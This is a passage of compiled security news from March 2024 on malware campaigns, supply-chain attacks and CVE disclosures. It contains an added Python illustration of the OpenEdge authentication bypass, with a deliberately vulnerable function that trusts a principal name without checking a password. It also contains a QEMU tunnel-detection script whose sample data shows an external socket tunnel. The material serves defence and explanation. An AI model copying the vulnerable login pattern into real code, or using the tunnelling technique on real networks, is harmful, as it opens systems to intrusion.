Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Windows Compressed Folder Tampering Vulnerability | No | No | - | - | Important | 6.5 | 5.7
Windows Error Reporting Service Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Windows Graphics Component Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Windows Hyper-V Denial of Service Vulnerability | No | No | - | - | Critical | 5.5 | 4.8
Windows Hyper-V Remote Code Execution Vulnerability | No | No | - | - | Critical | 8.1 | 7.1
Windows Installer Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Windows Kerberos Security Feature Bypass Vulnerability | No | No | - | - | Important | 7.5 | 6.5
Windows Kernel Denial of Service Vulnerability | No | No | - | - | Important | 5.5 | 4.8
Windows Kernel Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.3 | 6.4
Windows Kernel Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Windows Kernel Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Windows Kernel Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Windows Kernel Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Windows Kernel Information Disclosure Vulnerability | No | No | - | - | Important | 5.5 | 4.8
Windows Kernel Information Disclosure Vulnerability | No | No | - | - | Important | 5.5 | 4.8
Windows OLE Remote Code Execution Vulnerability | No | No | - | - | Important | 8.8 | 7.7
Windows Print Spooler Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.0 | 6.1
Windows Standards-Based Storage Management Service Denial of Service Vulnerability | No | No | - | - | Important | 6.5 | 5.7
Windows Telephony Server Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.0 | 6.1
Windows USB Attached SCSI (UAS) Protocol Remote Code Execution Vulnerability | No | No | - | - | Important | 5.7 | 5.1
Windows USB Hub Driver Remote Code Execution Vulnerability | No | No | - | - | Important | 6.8 | 5.9
Windows USB Print Driver Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.8 | 6.8
Windows USB Print Driver Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.0 | 6.1
Windows Update Stack Elevation of Privilege Vulnerability | No | No | - | - | Important | 7.0 | 6.1
Watch Out: These PyPI Python Packages Can Drain Your Crypto Wallets
12.3.24
Cryptocurrency
The Hacker News
Threat hunters have discovered a set of seven packages on the Python Package Index (PyPI) repository that are designed to steal BIP39 mnemonic phrases used for recovering private keys of a cryptocurrency wallet.
The software supply chain attack campaign has been codenamed BIPClip by ReversingLabs. The packages were collectively downloaded 7,451 times prior to them being removed from PyPI. The list of packages is as follows -
jsBIP39-decrypt (126 downloads)
bip39-mnemonic-decrypt (689 downloads)
mnemonic_to_address (771 downloads)
erc20-scanner (343 downloads)
public-address-generator (1,005 downloads)
hashdecrypt (4,292 downloads)
hashdecrypts (225 downloads)
BIPClip, which is aimed at developers working on projects related to generating and securing cryptocurrency wallets, is said to have been active since at least December 4, 2022, when hashdecrypt was first published to the registry.
"This is just the latest software supply chain campaign to target crypto assets," security researcher Karlo Zanki said in a report shared with The Hacker News. "It confirms that cryptocurrency continues to be one of the most popular targets for supply chain threat actors."
In a sign that the threat actors behind the campaign were careful to avoid detection, one of the packages in question -- mnemonic_to_address -- was devoid of any malicious functionality, barring listing bip39-mnemonic-decrypt as its dependency, which contained the malicious component.
"Even if they did opt to look at the package's dependencies, the name of the imported module and invoked function are carefully chosen to mimic legitimate functions and not raise suspicion, since implementations of the BIP39 standard include many cryptographic operations," Zanki explained.
The package, for its part, is designed to steal mnemonic phrases and exfiltrate the information to an actor-controlled server.
Two other packages identified by ReversingLabs – public-address-generator and erc20-scanner – operate in an analogous fashion, with the former acting as a lure to transmit the mnemonic phrases to the same command-and-control (C2) server.
On the other hand, hashdecrypts functions a little differently in that it's not conceived to work as a pair and contains within itself near-identical code to harvest the data.
The package, per the software supply chain security firm, includes references to a GitHub profile named "HashSnake," which features a repository called hCrypto that's advertised as a way to extract mnemonic phrases from crypto wallets using the package hashdecrypts.
A closer examination of the repository's commit history reveals that the campaign has been underway for over a year based on the fact that one of the Python scripts previously imported the hashdecrypt (without the "s") package instead of hashdecrypts until March 1, 2024, the same date hashdecrypts was uploaded to PyPI.
It's worth pointing out that the threat actors behind the HashSnake account also have a presence on Telegram and YouTube to advertise their warez. This includes releasing a video on September 7, 2022, showcasing a crypto logs checker tool dubbed xMultiChecker 2.0.
"The content of each of the discovered packages was carefully crafted to make them look less suspicious," Zanki said.
"They were laser focused on compromising crypto wallets and stealing the crypto currencies they contained. That absence of a broader agenda and ambitions made it less likely this campaign would trip up security and monitoring tools deployed within compromised organizations."
The findings once again underscore the security threats that lurk within open-source package repositories, a problem exacerbated by the fact that legitimate services like GitHub are used as a conduit to distribute malware.
Furthermore, abandoned projects are becoming an attractive vector for threat actors to seize control of the developer accounts and publish trojanized versions that could then pave the way for large-scale supply chain attacks.
"Abandoned digital assets are not relics of the past; they are ticking time bombs and attackers have been increasingly taking advantage of them, transforming them into trojan horses within the open-source ecosystems," Checkmarx noted last month.
"MavenGate and CocoaPods case studies highlight how abandoned domains and subdomains could be hijacked to mislead users and spread malicious intent."
Malware Campaign Exploits Popup Builder WordPress Plugin to Infect 3,900+ Sites
12.3.24
Virus
The Hacker News
A new malware campaign is leveraging a high-severity security flaw in the Popup Builder plugin for WordPress to inject malicious JavaScript code.
According to Sucuri, the campaign has infected more than 3,900 sites over the past three weeks.
"These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12th, 2024," security researcher Puja Srivastava said in a report dated March 7.
Infection sequences involve the exploitation of CVE-2023-6000, a security vulnerability in Popup Builder that could be exploited to create rogue admin users and install arbitrary plugins.
The shortcoming was exploited as part of a Balada Injector campaign earlier this January, compromising no less than 7,000 sites.
The latest set of attacks leads to the injection of malicious code, which comes in two different variants and is designed to redirect site visitors to other sites such as phishing and scam pages.
WordPress site owners are recommended to keep their plugins up-to-date as well as scan their sites for any suspicious code or users, and perform appropriate cleanup.
"This new malware campaign serves as a stark reminder of the risks of not keeping your website software patched and up-to-date," Srivastava said.
The development comes as WordPress security firm Wordfence disclosed a high-severity bug in another plugin known as Ultimate Member that can be weaponized to inject malicious web scripts.
The cross-site scripting (XSS) flaw, tracked as CVE-2024-2123 (CVSS score: 7.2), impacts all versions of the plugin, including and prior to 2.8.3. It has been patched in version 2.8.4, released on March 6, 2024.
The flaw stems from insufficient input sanitization and output escaping, thereby allowing unauthenticated attackers to inject arbitrary web scripts in pages that will be executed every time a user visits them.
"Combined with the fact that the vulnerability can be exploited by attackers with no privileges on a vulnerable site, this means that there is a high chance that unauthenticated attackers could gain administrative user access on sites running the vulnerable version of the plugin when successfully exploited," Wordfence said.
It's worth noting that the plugin maintainers addressed a similar flaw (CVE-2024-1071, CVSS score: 9.8) in version 2.8.3 released on February 19.
It also follows the discovery of an arbitrary file upload vulnerability in the Avada WordPress theme (CVE-2024-1468, CVSS score: 8.8) that could be abused to execute malicious code remotely. It has been resolved in version 7.11.5.
"This makes it possible for authenticated attackers, with contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible," Wordfence said.
South Korean Citizen Detained in Russia on Cyber Espionage Charges
12.3.24
BigBrothers
The Hacker News
Russia has detained a South Korean national for the first time on cyber espionage charges and transferred him from Vladivostok to Moscow for further investigation.
The development was first reported by Russian news agency TASS.
"During the investigation of an espionage case, a South Korean citizen Baek Won-soon was identified and detained in Vladivostok, and put into custody under a court order," an unnamed source was quoted as saying.
Won-soon has been accused of handing over classified "top secret" information to unnamed foreign intelligence agencies.
According to the agency, Won-soon was detained in Vladivostok earlier this year and shifted to Moscow late last month. He is said to be currently at the Lefortovo pretrial detention center. His arrest has been extended for another three months, until June 15, 2024.
The detention center is currently also the place where American journalist Evan Gershkovich is being held, awaiting trial on suspicion of espionage. Gershkovich has denied the charges.
The development comes amid burgeoning geopolitical ties between Russia and North Korea, even as state-sponsored hacking groups associated with the latter have targeted the Kremlin to pursue their strategic intelligence-gathering missions.
It also comes days after the U.S. arrested a former Google engineer for allegedly stealing proprietary information from the tech giant while covertly working for two China-based companies, including one founded by him last year prior to his resignation.
New Banking Trojan CHAVECLOAK Targets Brazilian Users via Phishing Tactics
12.3.24
Virus
The Hacker News
Users in Brazil are the target of a new banking trojan known as CHAVECLOAK that's propagated via phishing emails bearing PDF attachments.
"This intricate attack involves the PDF downloading a ZIP file and subsequently utilizing DLL side-loading techniques to execute the final malware," Fortinet FortiGuard Labs researcher Cara Lin said.
The attack chain involves the use of contract-themed DocuSign lures to trick users into opening PDF files containing a button to read and sign the documents.
In reality, clicking the button leads to the retrieval of an installer file from a remote link that's shortened using the Goo.su URL shortening service.
Present within the installer is an executable named "Lightshot.exe" that leverages DLL side-loading to load "Lightshot.dll," which is the CHAVECLOAK malware that facilitates the theft of sensitive information.
This includes gathering system metadata and running checks to determine whether the compromised machine is located in Brazil and, if so, periodically monitoring the foreground window to compare it against a predefined list of bank-related strings.
If it matches, a connection is established with a command-and-control (C2) server, and the malware proceeds to harvest various kinds of information and exfiltrate them to distinct endpoints on the server depending on the financial institution.
"The malware facilitates various actions to steal a victim's credentials, such as allowing the operator to block the victim's screen, log keystrokes, and display deceptive pop-up windows," Lin said.
"The malware actively monitors the victim's access to specific financial portals, including several banks and Mercado Bitcoin, which encompasses both traditional banking and cryptocurrency platforms."
Fortinet said it also uncovered a Delphi variant of CHAVECLOAK, once again highlighting the prevalence of Delphi-based malware targeting Latin America.
"The emergence of the CHAVECLOAK banking Trojan underscores the evolving landscape of cyberthreats targeting the financial sector, specifically focusing on users in Brazil," Lin concluded.
The findings come amid an ongoing mobile banking fraud campaign against the U.K., Spain, and Italy that entails using smishing and vishing (i.e., SMS and voice phishing) tactics to deploy an Android malware called Copybara with the goal of performing unauthorized banking transfers to a network of bank accounts operated by money mules.
"TAs [Threat actors] have been caught using a structured way of managing all the ongoing phishing campaigns via a centralized web panel known as 'Mr. Robot,'" Cleafy said in a report published last week.
"With this panel, TAs can enable and manage multiple phishing campaigns (against different financial institutions) based on their needs."
The C2 framework also allows attackers to orchestrate tailored attacks on distinct financial institutions using phishing kits that are engineered to mimic the user interface of the targeted entity, while also adopting anti-detection methods via geofencing and device fingerprinting to limit connections only from mobile devices.
The phishing kit – which serves as a fake login page – is responsible for capturing retail banking customer credentials and phone numbers and sending the details to a Telegram group.
Some of the malicious infrastructure used for the campaign is designed to deliver Copybara, which is managed using a C2 panel named JOKER RAT that displays all the infected devices and their geographical distribution over a live map.
It also allows the threat actors to remotely interact in real-time with an infected device using a VNC module, in addition to injecting fake overlays on top of banking apps to siphon credentials, logging keystrokes by abusing Android's accessibility services, and intercepting SMS messages.
On top of that, JOKER RAT comes with an APK builder that makes it possible to customize the rogue app's name, package name, and icons.
"Another feature available inside the panel is the 'Push Notification,' probably used to send to the infected devices fake push notifications that look like a bank notification to entice the user to open the bank's app in such a way that the malware can steal credentials," Cleafy researchers Francesco Iubatti and Federico Valentini said.
The growing sophistication of on-device fraud (ODF) schemes is further evidenced by a recently disclosed TeaBot (aka Anatsa) campaign that managed to infiltrate the Google Play Store under the guise of PDF reader apps.
"This application serves as a dropper, facilitating the download of a banking trojan of the TeaBot family through multiple stages," Iubatti said. "Before downloading the banking trojan, the dropper performs advanced evasion techniques, including obfuscation and file deletion, alongside multiple checks about the victim countries."
BianLian Threat Actors Exploiting JetBrains TeamCity Flaws in Ransomware Attacks
11.3.24
Ransom
The Hacker News
The threat actors behind the BianLian ransomware have been observed exploiting security flaws in JetBrains TeamCity software to conduct their extortion-only attacks.
According to a new report from GuidePoint Security, which responded to a recent intrusion, the incident "began with the exploitation of a TeamCity server which resulted in the deployment of a PowerShell implementation of BianLian's Go backdoor."
BianLian emerged in June 2022, and has since pivoted exclusively to exfiltration-based extortion following the release of a decryptor in January 2023.
The attack chain observed by the cybersecurity firm entails the exploitation of a vulnerable TeamCity instance using CVE-2024-27198 or CVE-2023-42793 to gain initial access to the environment, followed by creating new users in the build server and executing malicious commands for post-exploitation and lateral movement.
It's currently not clear which of the two flaws was weaponized by the threat actor for infiltration.
BianLian actors are known to implant a custom backdoor tailored to each victim written in Go, as well as drop remote desktop tools like AnyDesk, Atera, SplashTop, and TeamViewer. The backdoor is tracked by Microsoft as BianDoor.
"After multiple failed attempts to execute their standard Go backdoor, the threat actor pivoted to living-off-the-land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their Go backdoor," security researchers Justin Timothy, Gabe Renfro, and Keven Murphy said.
The obfuscated PowerShell backdoor ("web.ps1") is designed to establish a TCP socket for additional network communication to an actor-controlled server, allowing the remote attackers to conduct arbitrary actions on an infected host.
"The now-confirmed backdoor is able to communicate with the [command-and-control] server and asynchronously execute based on the remote attacker's post-exploitation objectives," the researchers said.
The disclosure comes as VulnCheck detailed fresh proof-of-concept (PoC) exploits for a critical security flaw impacting Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527) that could lead to remote code execution in a fileless manner and load the Godzilla web shell directly into memory.
The flaw has since been weaponized to deploy C3RB3R ransomware, cryptocurrency miners and remote access trojans over the past two months, indicating widespread exploitation in the wild.
"There's more than one way to reach Rome," VulnCheck's Jacob Baines noted. "While using freemarker.template.utility.Execute appears to be the popular way of exploiting CVE-2023-22527, other more stealthy paths generate different indicators."
Proof-of-Concept Exploit Released for Progress Software OpenEdge Vulnerability
11.3.24
Exploit
The Hacker News
Technical specifics and a proof-of-concept (PoC) exploit have been made available for a recently disclosed critical security flaw in Progress Software OpenEdge Authentication Gateway and AdminServer, which could be potentially exploited to bypass authentication protections.
Tracked as CVE-2024-1403, the vulnerability has a maximum severity rating of 10.0 on the CVSS scoring system. It impacts OpenEdge versions 11.7.18 and earlier, 12.2.13 and earlier, and 12.8.0.
"When the OpenEdge Authentication Gateway (OEAG) is configured with an OpenEdge Domain that uses the OS local authentication provider to grant user-id and password logins on operating platforms supported by active releases of OpenEdge, a vulnerability in the authentication routines may lead to unauthorized access on attempted logins," the company said in an advisory released late last month.
"Similarly, when an AdminServer connection is made by OpenEdge Explorer (OEE) and OpenEdge Management (OEM), it also utilizes the OS local authentication provider on supported platforms to grant user-id and password logins that may also lead to unauthorized login access."
Progress Software said the vulnerability incorrectly returns authentication success from an OpenEdge local domain if unexpected types of usernames and passwords are not appropriately handled, leading to unauthorized access sans proper authentication.
The flaw has been addressed in versions OpenEdge LTS Update 11.7.19, 12.2.14, and 12.8.1.
Horizon3.ai, which reverse-engineered the vulnerable AdminServer service, has since released a PoC for CVE-2024-1403, stating the issue is rooted in a function called connect() that's invoked when a remote connection is made.
This function, in turn, calls another function called authorizeUser() that validates that the supplied credentials meet certain criteria, and passes control to another part of the code that directly authenticates the user if the provided username matches "NT AUTHORITY\SYSTEM."
"Deeper attacker surface looks like it may allow a user to deploy new applications via remote WAR file references, but the complexity increased dramatically in order to reach this attack surface because of the use of internal service message brokers and custom messages," security researcher Zach Hanley said.
"We believe there is again likely an avenue to remote code execution via built in functionality given enough research effort."
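The two defects the write-up describes, a login path that trusts a caller-supplied principal name and credential checks that do not reject unexpected input types, shown as an added illustration beside a hardened form. This is hypothetical example code written for this page, not Progress Software's connect()/authorizeUser() implementation; the function names mirror the write-up, and the OS provider and its account table are constructed stand-ins.

```python
"""Illustration of the authentication anti-pattern behind CVE-2024-1403 as
described above, next to a hardened version. Hypothetical code: not the
product's implementation. The OS provider below is a constructed stand-in."""
from typing import Any

# Constructed stand-in for the OS local authentication provider. A real
# provider would delegate to PAM or LSA; this one is a fixed table.
_OS_ACCOUNTS = {"svc_admin": "correct horse battery staple"}

# Built-in principal that the write-up says was matched by name.
TRUSTED_PRINCIPAL = r"NT AUTHORITY\SYSTEM"


def os_provider_check(username: str, password: str) -> bool:
    """Stand-in for the OS local provider: only real credentials succeed."""
    return _OS_ACCOUNTS.get(username) == password


def authorize_user_vulnerable(username: Any, password: Any) -> bool:
    """Vulnerable pattern: the 'criteria' check only rejects missing values,
    and a matching principal name is authenticated without the provider."""
    if username is None or password is None:
        return False
    # Name-based trust: the password is never consulted for this principal.
    if username == TRUSTED_PRINCIPAL:
        return True
    return os_provider_check(username, password)


def authorize_user_hardened(username: Any, password: Any) -> bool:
    """Hardened pattern: strict input typing, no name-based trust, every
    login goes through the provider. Refusing the built-in principal outright
    is one reasonable policy, since it cannot legitimately hold a password."""
    if not isinstance(username, str) or not isinstance(password, str):
        return False  # unexpected types fail closed instead of being coerced
    if not username or not password:
        return False
    # Normalise before comparing so case or whitespace variants of the
    # reserved name cannot slip past the deny rule.
    if username.strip().casefold() == TRUSTED_PRINCIPAL.casefold():
        return False
    return os_provider_check(username, password)


def connect(username: Any, password: Any, *, hardened: bool = True) -> str:
    """Mirror of the remote-connection entry point (hypothetical): returns a
    session label on success and raises PermissionError otherwise."""
    check = authorize_user_hardened if hardened else authorize_user_vulnerable
    if check(username, password):
        return f"session:{username}"
    raise PermissionError("authentication failed")
```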
Magnet Goblin Hacker Group Leveraging 1-Day Exploits to Deploy Nerbian RAT
11.3.24
Virus
The Hacker News
A financially motivated threat actor called Magnet Goblin is swiftly adopting one-day security vulnerabilities into its arsenal in order to opportunistically breach edge devices and public-facing services and deploy malware on compromised hosts.
"Threat actor group Magnet Goblin's hallmark is its ability to swiftly leverage newly disclosed vulnerabilities, particularly targeting public-facing servers and edge devices," Check Point said.
"In some cases, the deployment of the exploits is within 1 day after a [proof-of-concept] is published, significantly increasing the threat level posed by this actor."
Attacks mounted by the adversary have leveraged unpatched Ivanti Connect Secure VPN, Magento, Qlik Sense, and possibly Apache ActiveMQ servers as an initial infection vector to gain unauthorized access. The group is said to be active since at least January 2022.
A successful exploitation is followed by the deployment of a cross-platform remote access trojan (RAT) dubbed Nerbian RAT, which was first disclosed by Proofpoint in May 2022, as well as its simplified variant called MiniNerbian. The use of the Linux version of Nerbian RAT was previously highlighted by Darktrace.
Both strains allow for the execution of arbitrary commands received from a command-and-control (C2) server and exfiltrate the results back to it.
Some of the other tools used by Magnet Goblin include the WARPWIRE JavaScript credential stealer, the Go-based tunneling software known as Ligolo, and legitimate remote desktop offerings such as AnyDesk and ScreenConnect.
"Magnet Goblin, whose campaigns appear to be financially motivated, has been quick to adopt 1-day vulnerabilities to deliver their custom Linux malware, Nerbian RAT and MiniNerbian," the company said.
"Those tools have operated under the radar as they mostly reside on edge-devices. This is part of an ongoing trend for threat actors to target areas which until now have been left unprotected."
Microsoft Confirms Russian Hackers Stole Source Code, Some Customer Secrets
9.3.24
APT
The Hacker News
Microsoft on Friday revealed that the Kremlin-backed threat actor known as Midnight Blizzard (aka APT29 or Cozy Bear) managed to gain access to some of its source code repositories and internal systems following a hack that came to light in January 2024.
"In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our corporate email systems to gain, or attempt to gain, unauthorized access," the tech giant said.
"This has included access to some of the company's source code repositories and internal systems. To date we have found no evidence that Microsoft-hosted customer-facing systems have been compromised."
Redmond, which is continuing to investigate the extent of the breach, said the Russian state-sponsored threat actor is attempting to leverage the different types of secrets it found, including those that were shared between customers and Microsoft in email.
It, however, did not disclose what these secrets were or the scale of the compromise, although it said it has directly reached out to impacted customers. It's not clear what source code was accessed.
Stating that it has increased its security investments, Microsoft further noted that the adversary ramped up its password spray attacks by as much as 10-fold in February, compared to the "already large volume" observed in January.
"Midnight Blizzard's ongoing attack is characterized by a sustained, significant commitment of the threat actor's resources, coordination, and focus," it said.
"It may be using the information it has obtained to accumulate a picture of areas to attack and enhance its ability to do so. This reflects what has become more broadly an unprecedented global threat landscape, especially in terms of sophisticated nation-state attacks."
The Microsoft breach is said to have taken place in November 2023, with Midnight Blizzard employing a password spray attack to successfully infiltrate a legacy, non-production test tenant account that did not have multi-factor authentication (MFA) enabled.
The tech giant, in late January, revealed that APT29 had targeted other organizations by taking advantage of a diverse set of initial access methods ranging from stolen credentials to supply chain attacks.
Midnight Blizzard is considered part of Russia's Foreign Intelligence Service (SVR). Active since at least 2008, the threat actor is one of the most prolific and sophisticated hacking groups, compromising high-profile targets such as SolarWinds.
Meta Details WhatsApp and Messenger Interoperability to Comply with EU's DMA Regulations
8.3.24
Social
The Hacker News
Meta has offered details on how it intends to implement interoperability in WhatsApp and Messenger with third-party messaging services as the Digital Markets Act (DMA) went into effect in the European Union.
"This allows users of third-party providers who choose to enable interoperability (interop) to send and receive messages with opted-in users of either Messenger or WhatsApp – both designated by the European Commission (EC) as being required to independently provide interoperability to third-party messaging services," Meta's Dick Brouwer said.
DMA, which officially became enforceable on March 7, 2024, requires companies in gatekeeper positions – Apple, Alphabet, Meta, Amazon, Microsoft, and ByteDance – to clamp down on anti-competitive practices from tech players, level the playing field, as well as compel them to open some of their services to competitors.
As part of its efforts to comply with the landmark regulations, the social media giant said it expects third-party providers to use the Signal Protocol, which is used in both WhatsApp and Messenger for end-to-end encryption (E2EE).
Third parties are also required to package the encrypted communications into message stanzas in eXtensible Markup Language (XML). Should the message contain media content, an encrypted version is downloaded by Meta clients from the third-party messaging servers using a Meta proxy service.
The company is also proposing what's called a "plug-and-play" model that allows third-party providers to connect to its infrastructure for achieving interoperability.
"Taking the example of WhatsApp, third-party clients will connect to WhatsApp servers using our protocol (based on the Extensible Messaging and Presence Protocol – XMPP)," Brouwer said.
"The WhatsApp server will interface with a third-party server over HTTP in order to facilitate a variety of things including authenticating third-party users and push notifications."
Furthermore, third-party clients are mandated to execute a WhatsApp Enlistment API when opting into its network, alongside providing cryptographic proof of their ownership of the third-party user-visible identifier when connecting or a third-party user registers on WhatsApp or Messenger.
The technical architecture also has provisions for a third-party provider to add a proxy or an intermediary between their client and the WhatsApp server to provide more information about the kinds of content their client can receive from the WhatsApp server.
"The challenge here is that WhatsApp would no longer have direct connection to both clients and, as a result, would lose connection level signals that are important for keeping users safe from spam and scams such as TCP fingerprints," Brouwer noted.
"This approach also exposes all the chat metadata to the proxy server, which increases the likelihood that this data could be accidentally or intentionally leaked."
Cisco Issues Patch for High-Severity VPN Hijacking Bug in Secure Client
8.3.24
Vulnerability
The Hacker News
Cisco has released patches to address a high-severity security flaw impacting its Secure Client software that could be exploited by a threat actor to open a VPN session with the privileges of a targeted user.
The networking equipment company described the vulnerability, tracked as CVE-2024-20337 (CVSS score: 8.2), as allowing an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user.
The flaw arises from insufficient validation of user-supplied input; a threat actor could leverage it by tricking a user into clicking on a specially crafted link while establishing a VPN session.
"A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token," the company said in an advisory.
"The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access."
The vulnerability impacts Secure Client for Windows, Linux, and macOS, and has been addressed in the following versions -
Earlier than 4.10.04065 (not vulnerable)
4.10.04065 and later (fixed in 4.10.08025)
5.0 (migrate to a fixed release)
5.1 (fixed in 5.1.2.42)
Amazon security researcher Paulos Yibelo Mesfin has been credited with discovering and reporting the flaw, telling The Hacker News that the shortcoming allows attackers to access local internal networks when a target visits a website under their control.
Cisco has also published fixes for CVE-2024-20338 (CVSS score: 7.3), another high-severity flaw in Secure Client for Linux that could permit an authenticated, local attacker to elevate privileges on an affected device. It has been resolved in version 5.1.2.42.
"An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process," it said. "A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges."
QEMU Emulator Exploited as Tunneling Tool to Breach Company Network
8.3.24
Exploit
The Hacker News
Threat actors have been observed leveraging the QEMU open-source hardware emulator as tunneling software during a cyber attack targeting an unnamed "large company" to connect to their infrastructure.
While a number of legitimate tunneling tools like Chisel, FRP, ligolo, ngrok, and Plink have been used by adversaries to their advantage, the development marks the first time QEMU has been observed being used for this purpose.
"We found that QEMU supported connections between virtual machines: the -netdev option creates network devices (backend) that can then connect to the virtual machines," Kaspersky researchers Grigory Sablin, Alexander Rodchenko, and Kirill Magaskin said.
"Each of the numerous network devices is defined by its type and supports extra options."
In other words, the idea is to create a virtual network interface and a socket-type network interface, thereby allowing the virtual machine to communicate with any remote server.
The Russian cybersecurity company said it was able to use QEMU to set up a network tunnel from an internal host within the enterprise network that didn't have internet access to a pivot host with internet access, which connects to the attacker's server on the cloud running the emulator.
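A hunting heuristic that turns the -netdev socket behaviour described above into a check over process listings, added here as an example and not Kaspersky's tooling. The sample process lines, the scoring weights, and the list of internal address ranges are constructed assumptions; the idea is to rank a QEMU guest higher when its socket backend reaches an external address and the guest looks like no real workload (no disk, tiny memory).

```python
"""Hunt for QEMU used as a network tunnel: a guest wired through a -netdev
socket backend to a remote peer. Example code added for this page, not
Kaspersky's tooling; the process lines are constructed samples."""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed `ps -eo pid,args`-style sample: a normal build VM, a diskless
# guest tunnelling to an external host, a lab VM peered with an internal
# host, and an unrelated process.
SAMPLE_PROCESSES = """\
4412 qemu-system-x86_64 -m 4096 -hda /var/lib/vms/build.qcow2 -netdev user,id=n0 -device e1000,netdev=n0
5120 qemu-system-x86_64 -m 64 -nographic -netdev user,id=lan,restrict=off -netdev socket,id=sock,connect=203.0.113.10:443 -device e1000,netdev=lan -device e1000,netdev=sock
6033 qemu-system-x86_64 -m 2048 -netdev socket,id=vlan,connect=10.0.5.21:1234 -hda /opt/lab/guest.img
7001 /usr/bin/python3 /opt/agent/run.py
"""

# Ranges treated as internal (assumption); anything else, or a hostname,
# counts as external.
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]
_NETDEV = re.compile(r"-netdev\s+(\S+)")
_DISK = re.compile(r"(?:-hd[abcd]|-drive|-cdrom)\b")
_MEM = re.compile(r"-m\s+(\d+)")


@dataclass
class Finding:
    pid: int
    score: int = 0
    reasons: List[str] = field(default_factory=list)


def _is_external(host: str) -> bool:
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True  # hostname: cannot be ruled internal
    return not any(ip in net for net in _INTERNAL_NETS)


def _netdev_options(spec: str) -> Dict[str, str]:
    """'socket,id=sock,connect=h:p' -> {'type': 'socket', 'id': ..., ...}"""
    kind, _, rest = spec.partition(",")
    opts = {"type": kind}
    for kv in filter(None, rest.split(",")):
        key, _, value = kv.partition("=")
        opts[key] = value
    return opts


def assess_process(line: str) -> Optional[Finding]:
    """Score one process line; None if not QEMU or nothing of interest."""
    pid_str, _, args = line.strip().partition(" ")
    if not pid_str.isdigit() or not args:
        return None
    exe = args.split()[0].rsplit("/", 1)[-1]
    if not exe.startswith("qemu-system"):
        return None
    finding = Finding(pid=int(pid_str))
    sockets = [o for o in map(_netdev_options, _NETDEV.findall(args))
               if o["type"] == "socket"]
    for opts in sockets:
        target = opts.get("connect") or opts.get("udp") or opts.get("mcast")
        if target:
            host = target.rsplit(":", 1)[0]
            finding.score += 3 if _is_external(host) else 1
            finding.reasons.append(f"socket netdev connects to {target}")
        elif "listen" in opts:
            finding.score += 1
            finding.reasons.append(f"socket netdev listens on {opts['listen']}")
    if sockets and not _DISK.search(args):
        finding.score += 2
        finding.reasons.append("socket netdev on a guest with no disk attached")
    mem = _MEM.search(args)
    if sockets and mem and int(mem.group(1)) <= 128:
        finding.score += 1
        finding.reasons.append(f"guest given only {mem.group(1)} MiB of RAM")
    return finding if finding.score else None


def scan_processes(listing: str, threshold: int = 4) -> Dict[int, Finding]:
    """Findings at or above threshold, keyed by PID."""
    results: Dict[int, Finding] = {}
    for line in listing.splitlines():
        found = assess_process(line)
        if found and found.score >= threshold:
            results[found.pid] = found
    return results
```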
The findings show that threat actors are continuously diversifying their attack strategies to blend their malicious traffic with actual activity and meet their operational goals.
"Malicious actors using legitimate tools to perform various attack steps is nothing new to incident response professionals," the researchers said.
"This further supports the concept of multi-level protection, which covers both reliable endpoint protection, and specialized solutions for detecting and protecting against complex and targeted attacks including human-operated ones."
CISA Warns of Actively Exploited JetBrains TeamCity Vulnerability
8.3.24
Exploit
The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a critical security flaw impacting JetBrains TeamCity On-Premises software to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
The vulnerability, tracked as CVE-2024-27198 (CVSS score: 9.8), refers to an authentication bypass bug that allows for a complete compromise of a susceptible server by a remote unauthenticated attacker.
It was addressed by JetBrains earlier this week alongside CVE-2024-27199 (CVSS score: 7.3), another moderate-severity authentication bypass flaw that allows for a "limited amount" of information disclosure and system modification.
"The vulnerabilities may enable an unauthenticated attacker with HTTP(S) access to a TeamCity server to bypass authentication checks and gain administrative control of that TeamCity server," the company noted at the time.
Threat actors have been observed weaponizing the twin flaws to deliver Jasmin ransomware as well as create hundreds of rogue user accounts, according to CrowdStrike and LeakIX. The Shadowserver Foundation said it detected exploitation attempts starting from March 4, 2024.
Statistics shared by GreyNoise show that CVE-2024-27198 has come under broad exploitation from over a dozen unique IP addresses shortly after public disclosure of the flaw.
In light of active exploitation, users running on-premises versions of the software are advised to apply the updates as soon as possible to mitigate potential threats. Federal agencies are required to patch their instances by March 28, 2024.
Hacked WordPress Sites Abusing Visitors' Browsers for Distributed Brute-Force Attacks
7.3.24
Attack
The Hacker News
Threat actors are conducting brute-force attacks against WordPress sites by leveraging malicious JavaScript injections, new findings from Sucuri reveal.
The attacks, which take the form of distributed brute-force attacks, "target WordPress websites from the browsers of completely innocent and unsuspecting site visitors," security researcher Denis Sinegubko said.
